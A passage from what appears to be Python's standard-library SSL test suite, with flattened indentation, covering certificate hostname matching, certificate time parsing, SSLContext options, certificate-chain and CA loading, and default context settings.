fail(cert, '<unsupported>')
# When there is a subjectAltName, commonName isn't used
fail(cert, 'linuxfrz.org')
# A pristine real-world example
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),),
(('commonName', 'mail.google.com'),))}
ok(cert, 'mail.google.com')
fail(cert, 'gmail.com')
# Only commonName is considered
fail(cert, 'California')
# -- IPv4 matching --
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (('DNS', 'example.com'),
('IP Address', '10.11.12.13'),
('IP Address', '14.15.16.17'))}
ok(cert, '10.11.12.13')
ok(cert, '14.15.16.17')
fail(cert, '14.15.16.18')
fail(cert, 'example.net')
# -- IPv6 matching --
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (('DNS', 'example.com'),
('IP Address', '2001:0:0:0:0:0:0:CAFE\n'),
('IP Address', '2003:0:0:0:0:0:0:BABA\n'))}
ok(cert, '2001::cafe')
ok(cert, '2003::baba')
fail(cert, '2003::bebe')
fail(cert, 'example.net')
# -- Miscellaneous --
# Neither commonName nor subjectAltName
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),))}
fail(cert, 'mail.google.com')
# No DNS entry in subjectAltName but a commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('commonName', 'mail.google.com'),)),
'subjectAltName': (('othername', 'blabla'), )}
ok(cert, 'mail.google.com')
        # No DNS entry in subjectAltName and no commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),)),
'subjectAltName': (('othername', 'blabla'),)}
fail(cert, 'google.com')
# Empty cert / no cert
self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')
# Issue #17980: avoid denials of service by refusing more than one
# wildcard per fragment.
cert = {'subject': ((('commonName', 'a*b.com'),),)}
ok(cert, 'axxb.com')
cert = {'subject': ((('commonName', 'a*b.co*'),),)}
fail(cert, 'axxb.com')
cert = {'subject': ((('commonName', 'a*b*.com'),),)}
with self.assertRaises(ssl.CertificateError) as cm:
ssl.match_hostname(cert, 'axxbxxc.com')
self.assertIn("too many wildcards", str(cm.exception))
def test_server_side(self):
# server_hostname doesn't work for server sockets
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with socket.socket() as sock:
self.assertRaises(ValueError, ctx.wrap_socket, sock, True,
server_hostname="some.hostname")
def test_unknown_channel_binding(self):
# should raise ValueError for unknown type
s = socket.socket(socket.AF_INET)
s.bind(('127.0.0.1', 0))
s.listen()
c = socket.socket(socket.AF_INET)
c.connect(s.getsockname())
with ssl.wrap_socket(c, do_handshake_on_connect=False) as ss:
with self.assertRaises(ValueError):
ss.get_channel_binding("unknown-type")
s.close()
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
# unconnected should return None for known type
s = socket.socket(socket.AF_INET)
with ssl.wrap_socket(s) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
# the same for server-side
s = socket.socket(socket.AF_INET)
with ssl.wrap_socket(s, server_side=True, certfile=CERTFILE) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
def test_dealloc_warn(self):
ss = ssl.wrap_socket(socket.socket(socket.AF_INET))
r = repr(ss)
with self.assertWarns(ResourceWarning) as cm:
ss = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_get_default_verify_paths(self):
paths = ssl.get_default_verify_paths()
self.assertEqual(len(paths), 6)
self.assertIsInstance(paths, ssl.DefaultVerifyPaths)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
paths = ssl.get_default_verify_paths()
self.assertEqual(paths.cafile, CERTFILE)
self.assertEqual(paths.capath, CAPATH)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_certificates(self):
self.assertTrue(ssl.enum_certificates("CA"))
self.assertTrue(ssl.enum_certificates("ROOT"))
self.assertRaises(TypeError, ssl.enum_certificates)
self.assertRaises(WindowsError, ssl.enum_certificates, "")
trust_oids = set()
for storename in ("CA", "ROOT"):
store = ssl.enum_certificates(storename)
self.assertIsInstance(store, list)
for element in store:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 3)
cert, enc, trust = element
self.assertIsInstance(cert, bytes)
self.assertIn(enc, {"x509_asn", "pkcs_7_asn"})
self.assertIsInstance(trust, (set, bool))
if isinstance(trust, set):
trust_oids.update(trust)
serverAuth = "1.3.6.1.5.5.7.3.1"
self.assertIn(serverAuth, trust_oids)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_crls(self):
self.assertTrue(ssl.enum_crls("CA"))
self.assertRaises(TypeError, ssl.enum_crls)
self.assertRaises(WindowsError, ssl.enum_crls, "")
crls = ssl.enum_crls("CA")
self.assertIsInstance(crls, list)
for element in crls:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 2)
self.assertIsInstance(element[0], bytes)
self.assertIn(element[1], {"x509_asn", "pkcs_7_asn"})
def test_asn1object(self):
expected = (129, 'serverAuth', 'TLS Web Server Authentication',
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertEqual(val, expected)
self.assertEqual(val.nid, 129)
self.assertEqual(val.shortname, 'serverAuth')
self.assertEqual(val.longname, 'TLS Web Server Authentication')
self.assertEqual(val.oid, '1.3.6.1.5.5.7.3.1')
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object, 'serverAuth')
val = ssl._ASN1Object.fromnid(129)
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object.fromnid, -1)
with self.assertRaisesRegex(ValueError, "unknown NID 100000"):
ssl._ASN1Object.fromnid(100000)
for i in range(1000):
try:
obj = ssl._ASN1Object.fromnid(i)
except ValueError:
pass
else:
self.assertIsInstance(obj.nid, int)
self.assertIsInstance(obj.shortname, str)
self.assertIsInstance(obj.longname, str)
self.assertIsInstance(obj.oid, (str, type(None)))
val = ssl._ASN1Object.fromname('TLS Web Server Authentication')
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertEqual(ssl._ASN1Object.fromname('serverAuth'), expected)
self.assertEqual(ssl._ASN1Object.fromname('1.3.6.1.5.5.7.3.1'),
expected)
with self.assertRaisesRegex(ValueError, "unknown object 'serverauth'"):
ssl._ASN1Object.fromname('serverauth')
def test_purpose_enum(self):
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertIsInstance(ssl.Purpose.SERVER_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.SERVER_AUTH, val)
self.assertEqual(ssl.Purpose.SERVER_AUTH.nid, 129)
self.assertEqual(ssl.Purpose.SERVER_AUTH.shortname, 'serverAuth')
self.assertEqual(ssl.Purpose.SERVER_AUTH.oid,
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.2')
self.assertIsInstance(ssl.Purpose.CLIENT_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.CLIENT_AUTH, val)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.nid, 130)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.shortname, 'clientAuth')
self.assertEqual(ssl.Purpose.CLIENT_AUTH.oid,
'1.3.6.1.5.5.7.3.2')
def test_unsupported_dtls(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
with self.assertRaises(NotImplementedError) as cx:
ssl.wrap_socket(s, cert_reqs=ssl.CERT_NONE)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with self.assertRaises(NotImplementedError) as cx:
ctx.wrap_socket(s)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
def cert_time_ok(self, timestring, timestamp):
self.assertEqual(ssl.cert_time_to_seconds(timestring), timestamp)
def cert_time_fail(self, timestring):
with self.assertRaises(ValueError):
ssl.cert_time_to_seconds(timestring)
@unittest.skipUnless(utc_offset(),
'local time needs to be different from UTC')
def test_cert_time_to_seconds_timezone(self):
# Issue #19940: ssl.cert_time_to_seconds() returns wrong
# results if local timezone is not UTC
self.cert_time_ok("May 9 00:00:00 2007 GMT", 1178668800.0)
self.cert_time_ok("Jan 5 09:34:43 2018 GMT", 1515144883.0)
def test_cert_time_to_seconds(self):
timestring = "Jan 5 09:34:43 2018 GMT"
ts = 1515144883.0
self.cert_time_ok(timestring, ts)
# accept keyword parameter, assert its name
self.assertEqual(ssl.cert_time_to_seconds(cert_time=timestring), ts)
# accept both %e and %d (space or zero generated by strftime)
self.cert_time_ok("Jan 05 09:34:43 2018 GMT", ts)
# case-insensitive
self.cert_time_ok("JaN 5 09:34:43 2018 GmT", ts)
self.cert_time_fail("Jan 5 09:34 2018 GMT") # no seconds
self.cert_time_fail("Jan 5 09:34:43 2018") # no GMT
self.cert_time_fail("Jan 5 09:34:43 2018 UTC") # not GMT timezone
self.cert_time_fail("Jan 35 09:34:43 2018 GMT") # invalid day
self.cert_time_fail("Jon 5 09:34:43 2018 GMT") # invalid month
self.cert_time_fail("Jan 5 24:00:00 2018 GMT") # invalid hour
self.cert_time_fail("Jan 5 09:60:43 2018 GMT") # invalid minute
newyear_ts = 1230768000.0
# leap seconds
self.cert_time_ok("Dec 31 23:59:60 2008 GMT", newyear_ts)
# same timestamp
self.cert_time_ok("Jan 1 00:00:00 2009 GMT", newyear_ts)
self.cert_time_ok("Jan 5 09:34:59 2018 GMT", 1515144899)
# allow 60th second (even if it is not a leap second)
self.cert_time_ok("Jan 5 09:34:60 2018 GMT", 1515144900)
# allow 2nd leap second for compatibility with time.strptime()
self.cert_time_ok("Jan 5 09:34:61 2018 GMT", 1515144901)
self.cert_time_fail("Jan 5 09:34:62 2018 GMT") # invalid seconds
        # no special treatment for the special value:
        # 99991231235959Z (RFC 5280)
self.cert_time_ok("Dec 31 23:59:59 9999 GMT", 253402300799.0)
@support.run_with_locale('LC_ALL', '')
def test_cert_time_to_seconds_locale(self):
# `cert_time_to_seconds()` should be locale independent
def local_february_name():
return time.strftime('%b', (1, 2, 3, 4, 5, 6, 0, 0, 0))
if local_february_name().lower() == 'feb':
self.skipTest("locale-specific month name needs to be "
"different from C locale")
# locale-independent
self.cert_time_ok("Feb 9 00:00:00 2007 GMT", 1170979200.0)
self.cert_time_fail(local_february_name() + " 9 00:00:00 2007 GMT")
class ContextTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_constructor(self):
for protocol in PROTOCOLS:
ssl.SSLContext(protocol)
self.assertRaises(TypeError, ssl.SSLContext)
self.assertRaises(ValueError, ssl.SSLContext, -1)
self.assertRaises(ValueError, ssl.SSLContext, 42)
@skip_if_broken_ubuntu_ssl
def test_protocol(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.protocol, proto)
def test_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ciphers("ALL")
ctx.set_ciphers("DEFAULT")
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
ctx.set_ciphers("^$:,;?*'dorothyx")
@skip_if_broken_ubuntu_ssl
def test_options(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# OP_ALL | OP_NO_SSLv2 | OP_NO_SSLv3 is the default value
self.assertEqual(ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3,
ctx.options)
ctx.options |= ssl.OP_NO_TLSv1
self.assertEqual(ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3 | ssl.OP_NO_TLSv1,
ctx.options)
if can_clear_options():
ctx.options = (ctx.options & ~ssl.OP_NO_SSLv2) | ssl.OP_NO_TLSv1
self.assertEqual(ssl.OP_ALL | ssl.OP_NO_TLSv1 | ssl.OP_NO_SSLv3,
ctx.options)
ctx.options = 0
self.assertEqual(0, ctx.options)
else:
with self.assertRaises(ValueError):
ctx.options = 0
def test_verify_mode(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# Default value
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
ctx.verify_mode = ssl.CERT_OPTIONAL
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
with self.assertRaises(TypeError):
ctx.verify_mode = None
with self.assertRaises(ValueError):
ctx.verify_mode = 42
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_verify_flags(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# default value
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT | tf)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_LEAF)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_CHAIN
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_CHAIN)
ctx.verify_flags = ssl.VERIFY_DEFAULT
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT)
# supports any value
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT
self.assertEqual(ctx.verify_flags,
ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT)
with self.assertRaises(TypeError):
ctx.verify_flags = None
def test_load_cert_chain(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# Combined key and cert in a single file
ctx.load_cert_chain(CERTFILE, keyfile=None)
ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
with self.assertRaises(OSError) as cm:
ctx.load_cert_chain(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(BADCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(EMPTYCERT)
# Separate key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_cert_chain(ONLYCERT, ONLYKEY)
ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
# Mismatching key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with self.assertRaisesRegex(ssl.SSLError, "key values mismatch"):
ctx.load_cert_chain(CAFILE_CACERT, ONLYKEY)
# Password protected key and cert
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD.encode())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=bytearray(KEY_PASSWORD.encode()))
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD)
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD.encode())
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED,
bytearray(KEY_PASSWORD.encode()))
with self.assertRaisesRegex(TypeError, "should be a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=True)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password="badpass")
with self.assertRaisesRegex(ValueError, "cannot be longer"):
# openssl has a fixed limit on the password buffer.
# PEM_BUFSIZE is generally set to 1kb.
# Return a string larger than this.
ctx.load_cert_chain(CERTFILE_PROTECTED, password=b'a' * 102400)
# Password callback
def getpass_unicode():
return KEY_PASSWORD
def getpass_bytes():
return KEY_PASSWORD.encode()
def getpass_bytearray():
return bytearray(KEY_PASSWORD.encode())
def getpass_badpass():
return "badpass"
def getpass_huge():
return b'a' * (1024 * 1024)
def getpass_bad_type():
return 9
def getpass_exception():
raise Exception('getpass error')
class GetPassCallable:
def __call__(self):
return KEY_PASSWORD
def getpass(self):
return KEY_PASSWORD
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_unicode)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytes)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytearray)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=GetPassCallable())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=GetPassCallable().getpass)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_badpass)
with self.assertRaisesRegex(ValueError, "cannot be longer"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_huge)
with self.assertRaisesRegex(TypeError, "must return a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bad_type)
with self.assertRaisesRegex(Exception, "getpass error"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_exception)
# Make sure the password function isn't called if it isn't needed
ctx.load_cert_chain(CERTFILE, password=getpass_exception)
def test_load_verify_locations(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_verify_locations(CERTFILE)
ctx.load_verify_locations(cafile=CERTFILE, capath=None)
ctx.load_verify_locations(BYTES_CERTFILE)
ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None)
self.assertRaises(TypeError, ctx.load_verify_locations)
self.assertRaises(TypeError, ctx.load_verify_locations, None, None, None)
with self.assertRaises(OSError) as cm:
ctx.load_verify_locations(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_verify_locations(BADCERT)
ctx.load_verify_locations(CERTFILE, CAPATH)
ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)
# Issue #10989: crash if the second argument type is invalid
self.assertRaises(TypeError, ctx.load_verify_locations, None, True)
def test_load_verify_cadata(self):
# test cadata
with open(CAFILE_CACERT) as f:
cacert_pem = f.read()
cacert_der = ssl.PEM_cert_to_DER_cert(cacert_pem)
with open(CAFILE_NEURONIO) as f:
neuronio_pem = f.read()
neuronio_der = ssl.PEM_cert_to_DER_cert(neuronio_pem)
# test PEM
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 0)
ctx.load_verify_locations(cadata=cacert_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 1)
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = "\n".join((cacert_pem, neuronio_pem))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# with junk around the certs
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = ["head", cacert_pem, "other", neuronio_pem, "again",
neuronio_pem, "tail"]
ctx.load_verify_locations(cadata="\n".join(combined))
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# test DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_verify_locations(cadata=cacert_der)
ctx.load_verify_locations(cadata=neuronio_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=cacert_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = b"".join((cacert_der, neuronio_der))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# error cases
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(TypeError, ctx.load_verify_locations, cadata=object)
with self.assertRaisesRegex(ssl.SSLError, "no start line"):
ctx.load_verify_locations(cadata="broken")
with self.assertRaisesRegex(ssl.SSLError, "not enough data"):
ctx.load_verify_locations(cadata=b"broken")
def test_load_dh_params(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_dh_params(DHFILE)
if os.name != 'nt':
ctx.load_dh_params(BYTES_DHFILE)
self.assertRaises(TypeError, ctx.load_dh_params)
self.assertRaises(TypeError, ctx.load_dh_params, None)
with self.assertRaises(FileNotFoundError) as cm:
ctx.load_dh_params(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
@skip_if_broken_ubuntu_ssl
def test_session_stats(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.session_stats(), {
'number': 0,
'connect': 0,
'connect_good': 0,
'connect_renegotiate': 0,
'accept': 0,
'accept_good': 0,
'accept_renegotiate': 0,
'hits': 0,
'misses': 0,
'timeouts': 0,
'cache_full': 0,
})
def test_set_default_verify_paths(self):
# There's not much we can do to test that it acts as expected,
# so just check it doesn't crash or raise an exception.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_default_verify_paths()
@unittest.skipUnless(ssl.HAS_ECDH, "ECDH disabled on this OpenSSL build")
def test_set_ecdh_curve(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ecdh_curve("prime256v1")
ctx.set_ecdh_curve(b"prime256v1")
self.assertRaises(TypeError, ctx.set_ecdh_curve)
self.assertRaises(TypeError, ctx.set_ecdh_curve, None)
self.assertRaises(ValueError, ctx.set_ecdh_curve, "foo")
self.assertRaises(ValueError, ctx.set_ecdh_curve, b"foo")
@needs_sni
def test_sni_callback(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# set_servername_callback expects a callable, or None
self.assertRaises(TypeError, ctx.set_servername_callback)
self.assertRaises(TypeError, ctx.set_servername_callback, 4)
self.assertRaises(TypeError, ctx.set_servername_callback, "")
self.assertRaises(TypeError, ctx.set_servername_callback, ctx)
def dummycallback(sock, servername, ctx):
pass
ctx.set_servername_callback(None)
ctx.set_servername_callback(dummycallback)
@needs_sni
def test_sni_callback_refcycle(self):
# Reference cycles through the servername callback are detected
# and cleared.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
def dummycallback(sock, servername, ctx, cycle=ctx):
pass
ctx.set_servername_callback(dummycallback)
wr = weakref.ref(ctx)
del ctx, dummycallback
gc.collect()
self.assertIs(wr(), None)
def test_cert_store_stats(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_cert_chain(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 1})
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 1, 'crl': 0, 'x509': 2})
def test_get_ca_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.get_ca_certs(), [])
# CERTFILE is not flagged as X509v3 Basic Constraints: CA:TRUE
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.get_ca_certs(), [])
# but CAFILE_CACERT is a CA cert
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.get_ca_certs(),
[{'issuer': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', '[email protected]'),)),
'notAfter': asn1time('Mar 29 12:29:49 2033 GMT'),
'notBefore': asn1time('Mar 30 12:29:49 2003 GMT'),
'serialNumber': '00',
'crlDistributionPoints': ('https://www.cacert.org/revoke.crl',),
'subject': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', '[email protected]'),)),
'version': 3}])
with open(CAFILE_CACERT) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
self.assertEqual(ctx.get_ca_certs(True), [der])
def test_load_default_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs(ssl.Purpose.SERVER_AUTH)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs(ssl.Purpose.CLIENT_AUTH)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(TypeError, ctx.load_default_certs, None)
self.assertRaises(TypeError, ctx.load_default_certs, 'SERVER_AUTH')
@unittest.skipIf(sys.platform == "win32", "not-Windows specific")
def test_load_default_certs_env(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
self.assertEqual(ctx.cert_store_stats(), {"crl": 0, "x509": 1, "x509_ca": 0})
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_load_default_certs_env_windows(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs()
stats = ctx.cert_store_stats()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
stats["x509"] += 1
self.assertEqual(ctx.cert_store_stats(), stats)
def test_create_default_context(self):
ctx = ssl.create_default_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
self.assertEqual(
ctx.options & getattr(ssl, "OP_NO_COMPRESSION", 0),
getattr(ssl, "OP_NO_COMPRESSION", 0),
)
with open(SIGNING_CA) as f:
cadata = f.read()
ctx = ssl.create_default_context(cafile=SIGNING_CA, capath=CAPATH,
cadata=cadata)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
self.assertEqual(
ctx.options & getattr(ssl, "OP_NO_COMPRESSION", 0),
getattr(ssl, "OP_NO_COMPRESSION", 0),
)
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
self.assertEqual(
ctx.options & getattr(ssl, "OP_NO_COMPRESSION", 0),
getattr(ssl, "OP_NO_COMPRESSION", 0),
)
self.assertEqual(
ctx.options & getattr(ssl, "OP_SINGLE_DH_USE", 0),
getattr(ssl, "OP_SINGLE_DH_USE", 0),
)
self.assertEqual(
ctx.options & getattr(ssl, "OP_SINGLE_ECDH_USE", 0),
getattr(ssl, "OP_SINGLE_ECDH_USE", 0),
)
def test__create_stdlib_context(self):
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1,
cert_reqs=ssl.CERT_REQUIRED,
check_hostname=True)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
